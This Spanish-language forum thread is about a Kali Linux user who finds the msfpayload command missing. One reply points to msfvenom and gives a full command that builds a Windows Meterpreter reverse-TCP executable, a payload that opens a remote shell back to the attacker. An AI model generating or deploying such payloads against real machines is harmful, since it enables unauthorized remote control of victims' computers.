Autor
|
Tema: bash:msfpayload :no se encontro la orden (Leído 9,793 veces)
|
estudianteaprendiendo
|
mi problema es que no se reconoce el comando tengo kali linux instalado en windows 7 me parece que mspayload ya no esta disponible se cambia por msfvenom
# msfpayload -h bash: msfpayload: no se encontro la oren
gracias por la ayuda.
|
|
« Última modificación: 7 Julio 2015, 21:06 pm por estudianteaprendiendo »
|
|
|
|
|
engel lex
|
hola! das tan poca info que es casi imposible ayudate, recomiendo leer estos 2 textos antes de intentar avanzar 10 pasos para plantear una duda informáticaFAQ : Como hacer preguntas "inteligentes"
|
|
|
|
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
|
|
|
estudianteaprendiendo
|
ya he modificado el tema espero quede un poco mas claro el problema igualmente sin pueden ayudame gracias de todas formas igual seguire buscando
|
|
|
|
|
|
|
engel lex
|
empezemos por... tienes msfpayload instalado?
|
|
|
|
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
|
|
|
estudianteaprendiendo
|
de echo ya abia usado el comando y funcionaba bien no daba problema
|
|
|
|
|
|
|
engel lex
|
te leíste los 2 links que dejé? no estás proporcionando información, no somos adivinos... imagina que un amigo te llama y te dice "en mi pc, abro la consola y escribo parse, le doy a enter y me dice que el comando no existe, una vez lo usé", eso es lo que estás haciendo aquí... lee los 2 links y piensa bien que información debes dar para poder ayudarte
|
|
|
|
|
|
|
noevs1
|
cambio, ahora es msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP -f exe por eso no te va adios espero que te sirviera
|
|
|
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
La compilación falló. /bin/sh: javac: no se encontró la orden
Java
|
Noxors
|
4
|
10,626
|
9 Octubre 2009, 20:58 pm
por Noxors
|
|
|
[Bash] Orden find se lia
Scripting
|
hervasiop12345
|
2
|
3,758
|
3 Agosto 2011, 00:59 am
por leogtz
|
|
|
[Bash] Abrir un proceso o otro script bash en una nueva shell
Scripting
|
nhaalclkiemr
|
2
|
14,372
|
27 Agosto 2011, 06:23 am
por nhaalclkiemr
|
|
|
[bash] como abrir otra consola y mandarle instrucciones desde bash?
Scripting
|
aixeiger
|
2
|
5,412
|
3 Diciembre 2012, 17:25 pm
por aixeiger
|
|